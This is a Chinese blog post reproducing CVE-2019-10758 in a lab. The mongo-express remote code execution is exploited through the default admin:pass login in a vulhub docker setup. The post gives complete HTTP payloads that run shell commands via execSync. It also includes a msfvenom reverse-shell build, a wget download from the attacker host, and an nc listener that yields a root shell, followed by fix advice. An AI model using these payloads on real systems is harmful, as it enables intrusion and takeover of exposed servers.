IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> mongo-express远程代码执行(CVE-2019-10758)漏洞复现(msfvenom/wget反弹shell) -> 正文阅读

[系统运维]mongo-express远程代码执行(CVE-2019-10758)漏洞复现(msfvenom/wget反弹shell)

mongo-express

mongo-express是一个MongoDB的Admin Web管理界面,基于NodeJS、Express、Bootstrap3开源编写

漏洞介绍

在开启了端口8081后,攻击者可以直接访问,而目标服务器上没有修改默认的登录密码admin/pass,则攻击者可以远程执行node.js代码

复现环境

mongo-express 0.53.0 
MongoDB Version 3.4.24

漏洞环境搭建

采用github开源docker漏洞环境搭建而成
项目地址:

https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758

进入具体漏洞环境,执行如下命令启动一个0.53.0版本的mongo-express:

cd vulhub-master/mango-express/CVE-2019-10758
docker-compose build
docker-compose up -d

在这里插入图片描述

启动成功后,访问
ip:8081
出现如下界面表示搭建成功
在这里插入图片描述

漏洞复现

  • 创建目录

抓包发送如下数据包执行代码,在tmp目录下创建success目录

POST /checkValid HTTP/1.1
Host: 192.168.0.113:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 121


document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")

其中Authorization: Basic YWRtaW46cGFzcw== 经base64解码为Authorization:
Basic admin:pass

通过BurpSuite进行抓包,发送如下数据包
在这里插入图片描述

进入docker中创建的web环境中查看/tmp/目录,可以发现成功创建了success目录

docker-compose exec web ls /tmp

或者获取一个bash shell
docker-compose exec web /bin/bash

在这里插入图片描述
在这里插入图片描述

  • 执行命令反弹shell

思路:
在kali上使用msf生成一个反弹shell.py,开启pythonHTTP服务器供靶机下载
靶机上,通过wget下载shell.py,在利用命令执行漏洞执行这个文件,反弹一个shell给kali

操作步骤
kali上
因为知道靶机web环境中存在python环境,所以创建一个python的反弹shell

msfvenom -p cmd/unix/reverse_python LHOST=192.168.0.109 LPORT=4444 -f raw > shell.py

在这里插入图片描述

运行python HTTP服务器,攻击者将从此服务器上下载shell.py

python -m SimpleHTTPServer

在这里插入图片描述

靶机上
攻击者执行命令,下载Python服务器上的shell.py,保存/tmp/shell
poc如下

POST /checkValid HTTP/1.1
Host: 192.168.0.113:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 121


document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("wget http://192.168.0.109:8000/shell.py -O /tmp/shell")

下载成功
在这里插入图片描述

kali上监听4444端口

nc -lvp 4444

再次发包命令执行,执行shell文件

POST /checkValid HTTP/1.1
Host: 192.168.0.113:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 121


document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("bash /tmp/shell")

在这里插入图片描述

反弹shell成功,获得的是root权限
在这里插入图片描述

修复建议

1.及时升级漏洞组件
2.不要使MongoExpres服务暴露在公网上
3.修改默认登录密码admin:pass

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2021-09-08 11:09:04  更:2021-09-08 11:10:33 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 15:12:38-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码